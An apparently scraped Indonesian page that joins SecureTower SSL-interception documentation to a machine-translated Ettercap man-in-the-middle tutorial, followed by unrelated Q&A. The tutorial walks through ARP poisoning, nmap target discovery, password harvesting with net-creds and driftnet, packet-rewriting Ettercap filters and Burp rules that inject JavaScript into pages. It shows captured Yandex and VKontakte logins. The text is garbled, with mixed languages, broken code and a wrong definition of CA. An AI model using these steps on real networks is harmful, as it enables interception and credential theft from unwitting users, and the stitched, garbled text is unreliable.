Instal sertifikat terenkripsi dari kartu SD

Saat diaktifkan Semua lalu lintas (terenkripsi dan tidak terenkripsi) atau Hanya terenkripsi agen menggunakan teknologi spoofing sertifikat SSL untuk mencegat data yang dikirimkan dalam sesi web yang aman. Saat membuat koneksi aman dengan server, agen mengganti sertifikat server asli dengan sertifikat dengan nama yang sama, tetapi dikeluarkan oleh sertifikat root agen. Sistem memungkinkan Anda untuk menggunakan sertifikat pra-instal dan sertifikat yang dibuat secara manual dengan otoritas penandatanganan sebagai root.

Sistem memungkinkan Anda untuk menginstal sertifikat tertentu secara manual untuk substitusi saat mencegat sesi dari server yang sesuai (situs web, program) dengan menautkan sertifikat ke server.

Dalam beberapa kasus, penggunaan sertifikat non-asli dapat menyebabkan ketidakmampuan untuk membuat sambungan terenkripsi ke server. Dalam hal ini, perlu untuk mengecualikan server yang sesuai dari intersepsi, mis. melarang penggantian sertifikat SSL saat menghubungkan ke server tersebut. Ini akan mengembalikan fungsionalitas situs atau program tersebut, tetapi intersepsi lalu lintas terenkripsi untuk mereka tidak akan dilakukan.

Untuk mengonfigurasi intersepsi lalu lintas SSL:

  1. Di jendela tab Profil pengaturan agendi area pengeditan profil pilih tab Kontrol lalu lintas jaringan.
  2. Klik tombol Opsi Intersepsi SSL dan ikuti rekomendasi dari paragraf saat ini.

Memilih mode spoofing sertifikat SSL

Di jendela pengaturan, pilih mode intersepsi yang dapat diterima:

  • Untuk generasi otomatis agen Sertifikat root SSL selama instalasi ke komputer pengguna, pilih opsi Mode otomatis . Sertifikat akar yang dihasilkan akan ditempatkan di basis data penerbit sertifikat tepercaya dan secara otomatis digunakan oleh agen untuk menerbitkan sertifikat anak yang ditandatangani secara default dengan nama penerbit Falcongaze SecureTower .

Instal sertifikat terenkripsi dari kartu SD

Untuk mengubah nama penerbit sertifikat, yang akan ditunjukkan dalam informasi keamanan koneksi, tentukan nama yang diinginkan di bidang Nama dalam sertifikat SSL.

  • Untuk menggunakan sertifikat SSL khusus sebagai sertifikat root saat mencegat lalu lintas terenkripsi, pilih opsi Mode pengguna. Sertifikat pengguna harus dibuat sebelumnya dan ditambahkan ke database sistem. Untuk menentukan sertifikat dari database sistem, pilih namanya di daftar drop-downSertifikat Penggunaatau klik tombolSertifikat pengguna untukmenambahkan sertifikat dan file kunci pribadi ke database sistem.

Instal sertifikat terenkripsi dari kartu SD

Di jendela yang terbuka, klik tombol Tambahkan Sertifikat dan tentukan file sertifikat dan kunci dengan salah satu cara berikut:

Instal sertifikat terenkripsi dari kartu SD

  1. Untuk membuat sertifikat baru, klik tombol Hasilkan Sertifikat. Di jendela yang terbuka, masukkan nama sertifikat baru, masa berlakunya, dan tentukan jalur tempat file sertifikat (*.cer) dan kunci pribadi (*.pvk) yang baru dibuat akan disimpan. Klik tombol Hasilkan.

Instal sertifikat terenkripsi dari kartu SD

  1. Jika Anda ingin menambahkan sertifikat yang sebelumnya dibuat dalam format PFX, klik tombol Konversi dari sertifikat dalam format PFX. Tentukan jalur dan kata sandi ke file sertifikat dalam format PFX, serta jalur ke file sertifikat (*.cer) dan kunci pribadi (*.pvk) tempat Anda ingin mengonversi file sumber. Klik tombol Convert untuk menyelesaikan konversi.

Instal sertifikat terenkripsi dari kartu SD

Klik Berikutnya di jendela Menambahkan Sertifikat Penggunauntuk melanjutkan prosedur tambahan . Di jendela yang terbuka, masukkan nama yang unik, yang akan digunakan untuk menandatangani sertifikat yang ditambahkan, dan komentar (opsional).

Instal sertifikat terenkripsi dari kartu SD

Klik Selesai untuk menyelesaikan proses. Sertifikat akan ditambahkan ke database sertifikat pengguna sistem SecureTower. Klik Oke untuk menyelesaikan penambahan.Menambahkan kustom sertifikat akan secara otomatis ditempatkan oleh agen dalam database kreator tepercaya (jika ini belum pernah dilakukan oleh administrator jaringan) dan kemudian akan digunakan untuk menerbitkan sertifikat anak.

Catatan.

Saat menggunakan mode pengguna, disarankan agar administrator jaringan mendistribusikan sertifikat pengguna ke semua komputer di jaringan menggunakan kebijakan grup atau secara manual. Ini akan memastikan otentikasi sertifikat berhasil. Jika tidak, sertifikat akan secara otomatis ditambahkan oleh agen ke toko sertifikat tepercaya.

Mengikat sertifikat SSL ke server

Untuk menentukan kecocokan "sertifikat server", klik tombol Ikatan sertifikatdan ikuti panduan di bawah ini:

Instal sertifikat terenkripsi dari kartu SD

  • Untuk mengikat ke server sertifikat root tertentu pada tab Sertifikat Root , tekan tombolnya Tambahkan sertifikat situs. Masukkan nama host (nama domain) ke mana sertifikat anak akan diterbitkan dan ke mana sertifikat root akan diikat di bidang Nama host (alamat IP). Pilih salah satu sertifikat root pra-instal dari daftar drop-down bidang Sertifikat Root atau klik tombol Sertifikat Pengguna untuk menambahkan dan menentukan sertifikat dan file kunci pribadi di komputer pengguna.
  • Untuk mengikat sertifikat yang sudah ada ke server tertentu, pilih tab Sertifikat Pengguna. Agen tidak akan membuat sertifikat anak baru untuk server yang ditentukan di tab ini, tetapi akan menggunakan sertifikat yang ditentukan oleh pengguna untuk prosedur substitusi. Di jendela yang terbuka, di bidang Nama host (alamat IP), masukkan nama host (nama domain) yang akan diikat dengan sertifikat. Pilih salah satu sertifikat di daftar drop-down bidang Certificate : (jika sertifikat telah ditambahkan sebelumnya) atau klik tombol Sertifikat Pengguna untuk memilih sertifikat pengguna dari daftar, atau untuk menambahkan dan menentukan file sertifikat dan kunci pribadi di komputer pengguna.

Catatan.

Untuk mengisi kolom Nama host (alamat IP) penggunaan alamat IP host diperbolehkan, tetapi hanya dalam kasus di mana nama host tidak ditentukan selama koneksi dan hanya alamat IP yang diketahui.

Mengecualikan server dari mencegat lalu lintas terenkripsi

Untuk bekerja dengan pengecualian dari proses spoofing sertifikat, klik tombolPengecualian Server SSL.

Jendela manajer pengecualian menampilkan daftar server (host) yang dikecualikan dari proses penggantian secara default. Untuk menambahkan pengecualian baru, klik tombol Tambahkan pengecualian.

Di bidang masukan dari kotak dialog yang terbuka, masukkan nama server (host) (misalnya, accounts.google.com), peka huruf besar/kecil, dan klik tombol Tambah. Sistem memungkinkan Anda menggunakan nama bertopeng (apakah ? dan karakter * diperbolehkan, misalnya, menggunakan *.microsoft.* akan menghindari duplikat sumber daya Microsoft dalam daftar pengecualian) untuk mengecualikan sumber daya dari keluarga yang sama. Nama yang dimasukkan akan muncul dalam daftar pengecualian.

Selanjutnya, Anda perlu memilih mode pengecualian: Sertifikat palsu hanya untuk server SSL yang tercantum di atas, atau SSL Pengganti - sertifikat untuk semua server, kecuali yang disebutkan di atas. Dalam kasus pertama, sistem akan memalsukan sertifikat hanya untuk server yang terdaftar dalam daftar pengecualian (dan, oleh karena itu, akan dapat mencegat lalu lintas yang sesuai). Untuk semua yang lain, sertifikat tidak akan dipalsukan, dan intersepsi lalu lintas terenkripsi yang sesuai tidak mungkin dilakukan. Dalam kasus kedua, sistem akan mengganti sertifikat untuk semua server, kecuali yang ditentukan dalam daftar pengecualian.

Untuk melakukan operasi lain dengan pengecualian, ikuti rekomendasi yang relevan di paragraf

Alternatif Ettercap

Ettercap adalah yang paling program populer untuk serangan man-in-the-middle, tapi apakah itu yang terbaik? Sepanjang instruksi, Anda akan melihat bahwa Ettercap hampir tidak pernah digunakan sendiri, bahwa satu atau program lain selalu berbaris dengannya dalam rantai pemrosesan lalu lintas. Mungkin ini menambah fleksibilitas, secara umum, pendekatan ini adalah dasar dari UNIX - satu program melakukan satu tugas, dan pengguna akhir menggabungkan berbagai program untuk mencapai hasil yang diinginkan. Dengan pendekatan ini, kode program lebih mudah dipelihara; "batu bata" mini seperti itu dapat digunakan untuk membangun sistem dengan kompleksitas dan fleksibilitas apa pun. Namun, memiliki lima konsol terbuka dengan tugas yang berbeda, pekerjaan program yang ditujukan untuk mencapai satu hasil tunggal - ini sangat tidak nyaman, hanya saja lebih sulit, ada kemungkinan membuat kesalahan pada tahap tertentu, dan seluruh sistem yang dikonfigurasi akan berjalan menganggur.

Net-Creds mengendus:

  • URL yang dikunjungi
  • mengirim permintaan POST
  • login/kata sandi dari formulir HTTP
  • login/kata sandi untuk otentikasi HTTP dasar
  • Pencarian HTTP
  • Login/kata sandi FTP
  • Login/kata sandi IRC
  • Login/kata sandi POP
  • Login/kata sandi IMAP
  • Login/kata sandi Telnet
  • Login/kata sandi SMTP
  • string komunitas SNMP
  • semua protokol NTLMv1/v2 yang didukung seperti HTTP, SMB, LDAP, dll.
  • Kerberos

Pilihan gambar yang dicegat dengan baik, dan driftnet lebih sederhana dalam hal ini - hanya menampilkan gambar yang dicegat.

Alihkan mesin Anda ke mode penerusan.

echo "1" > /proc/sys/net/ipv4/ip_forward

Kami memulai Ettercap dengan antarmuka grafis ( -G):

Ettercap-G

Instal sertifikat terenkripsi dari kartu SD

Sekarang pilih tuan rumah, memiliki subparagraf Pindai host. Setelah pemindaian selesai, pilih daftar tuan rumah:

Instal sertifikat terenkripsi dari kartu SD

Sebagai Tujuan1 pilih perute ( Tambahkan ke Target 1), sebagai Tujuan2 pilih perangkat yang ingin Anda serang ( Tambahkan ke Target 2).

Tapi di sini halangan pertama mungkin muncul, terutama jika ada banyak host. V instruksi yang berbeda, termasuk dalam video yang disajikan di atas, penulis naik ke mesin target (untuk beberapa alasan, setiap orang memiliki Windows di sana) dan menggunakan perintah untuk melihat IP mesin ini di jaringan lokal. Setuju, opsi ini tidak dapat diterima untuk kondisi nyata.

Jika Anda memindai, maka Anda bisa mendapatkan beberapa informasi tambahan tentang host, lebih tepatnya, tentang produsen kartu jaringan:

nmap -sn 192.168.1.0/24

Instal sertifikat terenkripsi dari kartu SD

Jika data masih kurang, maka Anda dapat melakukan scan dengan definisi OS:

nmap -O 192.168.1.0/24

Instal sertifikat terenkripsi dari kartu SD

Seperti yang Anda lihat, mesin dengan IP 192.168.1.33 ternyata adalah Windows, jika ini bukan tanda dari atas, lalu apa itu? lol

Itu yang kami tambahkan sebagai gol kedua.

Sekarang mari kita beralih ke item menu. Mitm. Di sana pilih keracunan ARP… Centang kotak Mengendus koneksi jarak jauh.

Instal sertifikat terenkripsi dari kartu SD

Kami mulai memanen, dalam satu jendela kami meluncurkan

kredit bersih

di tempat lain (kedua program dapat dijalankan tanpa opsi)

jaring hanyut

Pengumpulan data segera dimulai.

Instal sertifikat terenkripsi dari kartu SD

Di sisi kanan, driftnet telah membuka jendela lain yang menampilkan gambar yang diambil. Di jendela net-creds, kami melihat situs yang dikunjungi dan kata sandi yang dicegat:

Instal sertifikat terenkripsi dari kartu SD

1.2 Ettercap + Burp Suite

3. Lihat data (situs web yang dikunjungi dan kata sandi yang diambil) di Ettercap

Di menu melihat kami memiliki tab yang tersedia koneksi dan profil. Anda juga dapat mencentang kotak Menyelesaikan alamat IP(terjemahkan alamat IP). Koneksi, tentu saja, adalah koneksi. Ettercap mengumpulkan profil dalam memori untuk setiap host yang ditemukannya. Pengguna dan kata sandi dikumpulkan di sana. Dalam hal ini, profil dengan data akun yang diambil (kata sandi) ditandai dengan tanda silang:

Instal sertifikat terenkripsi dari kartu SD

Jangan terlalu bergantung pada profil - misalnya, login dan kata sandi yang dicegat untuk FTP dan layanan lain ditandai, yang olehnya program dapat dengan tegas menafsirkan informasi yang diterima sebagai kredensial. Ini tidak termasuk, misalnya, data otentikasi dasar, login dan kata sandi yang dimasukkan dalam formulir web.

Di Connections, data yang paling menjanjikan ditandai dengan tanda bintang:

Instal sertifikat terenkripsi dari kartu SD

Anda dapat mengklik dua kali entri ini untuk melihat detailnya:

Instal sertifikat terenkripsi dari kartu SD

Agar tidak mencari bintang-bintang ini di seluruh daftar, Anda dapat mengurutkan berdasarkan bidang ini dan semuanya akan berada di atas atau bawah:

Instal sertifikat terenkripsi dari kartu SD

Tertangkap otentikasi dasar:

Instal sertifikat terenkripsi dari kartu SD

Kata sandi masuk untuk Yandex (disorot di bawah):

Instal sertifikat terenkripsi dari kartu SD

Ini adalah kredensial yang dicegat untuk Vkontakte:

Instal sertifikat terenkripsi dari kartu SD

Juga, data paling menarik dikumpulkan di konsol bawah:

Instal sertifikat terenkripsi dari kartu SD

Jika Anda ingin menyimpan hasil program, gunakan opsi ini (tentukan kunci saat memulai Ettercap:

Opsi pencatatan: -w, --write<файл>tulis data yang diambil ke pcapfile<файл>-L, --log<логфайл>tulis semua lalu lintas ke ini<логфайл>-l, --log info<логфайл>tulis hanya informasi pasif untuk ini<логфайл>-m, --log-pesan<логфайл>tulis semua pesan ke ini<логфайл>-c, --compress gunakan kompresi gzip untuk file log

4. Substitusi data dengan cepat di Ettercap

4.1 Menggunakan Filter Ettercap Kustom

Catatan: Dalam semua pengujian saya, filter Ettercap tidak berfungsi. Sulit untuk memahami apakah itu ada di tangan, di fitur perangkat keras atau di bug di program itu sendiri ... Tetapi untuk versi 0.8.2 (terbaru saat ini), ada laporan bug tentang masalah dengan filter. Secara umum, dilihat dari laporan bug dan forum, filter sering jatuh, atau tidak berfungsi sama sekali untuk waktu yang lama. Ada cabang yang dimodifikasi 5 bulan yang lalu https://github.com/Ettercap/ettercap/tree/filter-improvements, mis. perbaikan filter (dengan perbaikan filter). Berbagai macam pengujian dilakukan untuk cabang ini dan untuk versi dari repositori, berbagai filter diuji dalam kondisi yang berbeda, banyak waktu dihabiskan, tetapi tidak ada hasil. Omong-omong, untuk mengatur versi perbaikan filter ke Kali Linux Anda perlu melakukan ini:

sudo apt-get remove ettercap-graphical ettercap-common sudo apt-get install git debhelper bison periksa cmake flex ghostscript libbsd-dev libcurl4-openssl-dev libgtk2.0-dev libltdl-dev libluajit-5.1-dev libncurses5-dev libnet1-dev libpcap-dev libpcre3-dev libssl-dev libgtk-3-dev ghostscript groff libtool libpcre3 libncurses5-dev git clone -b filter-improvements https://github.com/Ettercap/ettercap.git cd ettercap/ mkdir build cd build cmake ENABLE_PDF_DOCSABLE_PDF =On ../ make sudo make install

Secara umum, jika filter Anda tidak berfungsi, maka Anda tidak sendirian. Dalam instruksi untuk Ettercap, saya tidak dapat melewatkan topik filter, jadi mereka akan tetap dipertimbangkan.

Sejauh ini kami telah menggunakan Ettercap untuk spoofing ARP. Ini adalah aplikasi yang sangat dangkal. Berkat filter khusus, kami dapat mengintervensi dan mengubah lalu lintas dengan cepat. Filter harus disimpan dalam file terpisah dan harus dikompilasi dengan program Etterfilter sebelum digunakan. Meskipun dokumentasi yang diberikan tautan tampaknya singkat, tetapi ditambah dengan contoh di bawah, ini akan memungkinkan Anda untuk menulis beberapa filter yang cukup menarik.

Mari kita buat filter pertama kita, itu akan menggantikan semua gambar dengan ini:

Instal sertifikat terenkripsi dari kartu SD

Dalam file bernama img_replacer.filter salin:

If (ip.proto == TCP && tcp.dst == 80) ( if (search(DATA.data, "Accept-Encoding")) ( replace("Accept-Encoding", "Accept-Rubbish!"); # catatan: string pengganti sama panjangnya dengan pesan asli("zapped Accept-Encoding!\n"); ) ) if (ip.proto == TCP && tcp.src == 80) ( replace("src=" , " src=\"http://www.irongeek.com/images/jollypwn.png\" "); replace("SRC=", "src=\"http://www.irongeek.com/images/ jollypwn. png\" "); replace("src =", "src=\"http://www.irongeek.com/images/jollypwn.png\" "); replace("SRC=", "src= \" http://www.irongeek.com/images/jollypwn.png\" "); msg("Filter Berlari.\n"); )

Kompilasi file:

Etterfilter img_replacer.filter -o img_replacer.ef

Hasil kompilasi:

Etterfilter 0.8.2 hak cipta 2001-2015 Tim Pengembang Ettercap 14 tabel protokol dimuat: DATA DECODED udp tcp esp gre icmp ipv6 ip arp wifi fddi tr eth 13 konstanta dimuat: VRRP OSPF GRE UDP TCP ESP ICMP6 ICMP PPTP PPPOE IP6 IP ARP File sumber penguraian "img_replacer.filter" selesai. Pembukaan meta-tree selesai. Konversi label ke offset nyata selesai. Menulis output ke "img_replacer.ef" selesai. -> Script dikodekan menjadi 18 instruksi.

Kunci -F memberitahu program untuk memuat filter dari file yang mengikuti kunci. Setelah dikompilasi, nama file baru kita dengan filter adalah img_replacer.ef, sehingga perintahnya menjadi:

Ettercap -G -F img_replacer.ef

Catatan J: Saat Anda memantau lalu lintas web, paket yang Anda lihat mungkin dalam bentuk yang disandikan. Untuk kerja yang efektif filter, Ettercap membutuhkan lalu lintas teks biasa. Menurut beberapa pengamatan, jenis penyandian yang digunakan halaman web adalah "Accept-Encoding: gzip, deflate"

Di bawah ini adalah filter yang menimpa pengkodean, memaksa komunikasi dalam bentuk teks biasa:

If (ip.proto == TCP && tcp.dst == 80) ( if (search(DATA.data, "gzip")) ( replace("gzip", " "); # catatan: empat spasi dalam string msg ke replace ("menghapus gzip\n"); ) ) if (ip.proto == TCP && tcp.dst == 80) ( if (search(DATA.data, "deflate")) ( replace("deflate", " "); # catatan: tujuh spasi dalam string pengganti msg("whited out deflate\n"); ) )

Sintaks untuk menulis filter dijelaskan secara rinci, dan kemudian beberapa contoh lagi:

# ganti teks dalam paket: if (ip.proto == TCP && search(DATA.data, "lol"))( replace("lol", "smh"); msg("filter run"); ) # tampilkan pesan jika port tcp adalah 22 if (ip.proto == TCP) ( if (tcp.src == 22 || tcp.dst == 22) ( msg("SSH packet\n"); ) ) # log semua lalu lintas telnet , juga jalankan ./program per paket if (ip.proto == TCP) ( if (tcp.src == 23 || tcp.dst == 23) ( log(DATA.data, "./logfile.log ") ; exec("./program"); ​​) ) # mencatat semua lalu lintas kecuali http if (ip.proto == TCP && tcp.src != 80 && tcp.dst != 80) ( log(DATA.data , "./logfile.log"); ) # beberapa operasi muatan paket jika (DATA.data + 20 == 0x4142) ( DATA.data + 20 = 0x4243; ) else ( DATA.data = "dimodifikasi"; DATA .data + 20 = 0x4445; ) # jatuhkan semua paket yang berisi "ettercap" if (search(DECODED.data, "ettercap")) ( msg("seseorang membicarakan kita...\n"); drop( ); kill( ); ) # tulis paket ssh terdekripsi yang cocok dengan ekspresi reguler if (ip.proto == TCP) ( jika (tcp.src == 22 || tcp.dst == 22) ( if (regex(DECODED.data, ".*login.*")) ( log(DECODED.data, "./decrypted_log"); ) ) ) # membunuh paket if (ip.ttl< 5) { msg("The packet will die soon\n"); } # то же самое для IPv6, но делая тривиальный тест убеждаемся, что перед нами действительно IPv6 пакеты if (eth.proto == IP6 && ipv6.hl < 5) { msg("The IPv6 packet will die soon\n"); } # сравнение строки на данный сдвиг if (DATA.data + 40 == "ette") { log(DATA.data, "./logfile"); } # вставить файл после указанного пакета if (tcp.src == 21 && search(DATA.data, "root")) { inject("./fake_response"); } # целиком заменить пакет на другой if (tcp.src == 23 && search(DATA.data, "microsoft")) { drop(); inject("./fake_telnet"); } # Изменение бинарных данных используя внешнюю программу if (udp.dst == 53 && pcre_regex(DATA.data, ".*\x03com\x00.*")) { log(DATA.data, "/tmp/payload"); drop(); execinject("/bin/sed "s/\x03com\x00/\x02my\x04page\x02de\x00/g" /tmp/payload"); udp.len += 7; exec("/bin/rm /tmp/payload"); msg("faked"); } # фильтровать только указанный IP адрес if (ip.src == "192.168.0.2") { drop(); } # делать то же самое для IPv6 if (ipv6.src == "2001:db8::1") { drop(); } # комбинируем IPv4 и IPv6 if (eth.proto == IP && ip.dst == "192.168.0.2") { msg("drop IPv4"); drop(); } if (eth.proto == IP6 && ipv6.dst == "2001:db8::1") { msg("drop IPv6"); drop(); } # транслировать tcp пакеты с порта 80 на 81 if (tcp.dst == 80) { tcp.dst -= 1; tcp.dst += 2; } # найти и покалечить пакеты ESP if (ip.proto == ESP) { DATA.data = "DEADDECAF"; }

4.2 Pemalsuan data dengan Burp

Kami meluncurkan Ettercap dan Burp seperti yang dijelaskan dalam paragraf 1.2 atau paragraf 2.2.

Dalam sendawa pergi ke Proksi -> Opsi. Kami menemukan di sana Cocokkan dan Ganti. Klik Menambahkan untuk menambahkan aturan baru.

  • Minta tajuk adalah tajuk permintaan
  • badan permintaan- badan permintaan
  • tajuk tanggapan- tajuk tanggapan
  • badan tanggapan- badan tanggapan
  • Minta nama param- Nama parameter kueri
  • Minta nilai parameter- Minta nilai parameter
  • Permintaan baris pertama- Baris pertama kueri

Jika Anda perlu mengubah data yang dikirimkan DAPATKAN metode, maka itu berlaku untuk header.

Dalam markup HTML juga ada yang namanya kepala (head tag). Yang disebutkan di atas tidak ada hubungannya dengan judul ini. Sedikit lebih tinggi dikatakan tentang header paket. Jika Anda ingin mengubah konten halaman HTML, maka Anda harus selalu memilih Response body daripada Request header, bahkan jika Anda akan mengubah konten tag head (misalnya, judul).

Jika Anda tidak terbiasa dengan ekspresi reguler, maka, pada prinsipnya, tidak apa-apa: HTML banyak memaafkan, dan apa yang tidak dipahaminya, diabaikan begitu saja - Anda dapat menggunakannya. Jika Anda tahu cara menggunakan ekspresi reguler, maka saya menghormati Anda.)))

Misalnya, mari kita buat aturan baru, ubah header Request menjadi Response body. Dalam aturan itu sendiri, kami akan berubah

Centang kotak pertandingan ekspresi reguler.

Instal sertifikat terenkripsi dari kartu SD

Sekarang di semua situs (tanpa HTTPS) alih-alih judul tidak akan ada Judul:

Instal sertifikat terenkripsi dari kartu SD

Sisipkan baris arbitrer setelah tag tubuh (ini akan menjadi baris pertama dalam teks). Header permintaan diubah menjadi Badan respons. Kita berubah

Centang kotak pertandingan ekspresi reguler.

Instal sertifikat terenkripsi dari kartu SD

Di pojok kanan atas (tergantung layout) muncul tulisan "I am cool!". Anda dapat memasukkan CSS, kode JavaScript, teks apa saja - apa saja. Anda biasanya dapat menghapus semuanya dari halaman, dan kemudian mengisinya dengan konten Anda sendiri - semuanya tergantung pada imajinasi Anda.

Instal sertifikat terenkripsi dari kartu SD

Ada ide untuk sedikit memodifikasi setiap formulir sehingga data dikirim ke server asli dan ke server penyerang (terapkan multi-submit untuk setiap formulir). Tetapi dengan alasan bahwa jika data yang dikirimkan tidak dienkripsi dan kami memiliki akses ke sana, maka kami tetap melihatnya, kami tidak perlu mengirimkannya ke server mana pun. Namun demikian, jika seseorang membutuhkannya, contoh yang benar-benar berfungsi untuk mengirim data dari satu formulir ke beberapa server sekaligus.

5. Hubungan Daging Sapi

Untuk mulai menggunakan fitur BeEF, kita perlu menyematkan file JavaScript di HTML, biasanya baris seperti:

Apa fungsi instal sertifikat WiFi?

Sertifikat WiFi melindungi proses registrasi dan mengenkripsi kredensial masuk saat terhubung ke WiFi publik, yang pada akhirnya menyediakan akses jaringan yang aman dan meningkatkan kepercayaan pada hotspot publik dan layanan pendaftaran.

Apa itu sertifikat CA?

Chartered Accountant adalah sertifikasi profesional yang ditetapkan oleh Ikatan Akuntan Indoesia (IAI) sesuai dengan standar internasional. Sertifikasi CA bertujuan untuk meningkatan kualitas akuntan yang profesional dan berdaya saing global.

Apa itu sertifikat di hp?

Sertifikat digital mengidentifikasi komputer, ponsel, dan aplikasi untuk alasan keamanan. Sama seperti Anda menggunakan SIM untuk menunjukkan bahwa secara hukum Anda dapat mengemudi, sertifikat digital mengidentifikasi ponsel Anda dan mengonfirmasi bahwa ponsel dapat mengakses sesuatu.

Apa fungsi kredensial terpercaya?

Kredensial merupakan suatu sertifikat yang berfungsi untuk menjaga keamanan sistem dari pembobol dan cracker (penjarah) akun sebagai validasi masuk di root pada sistem android.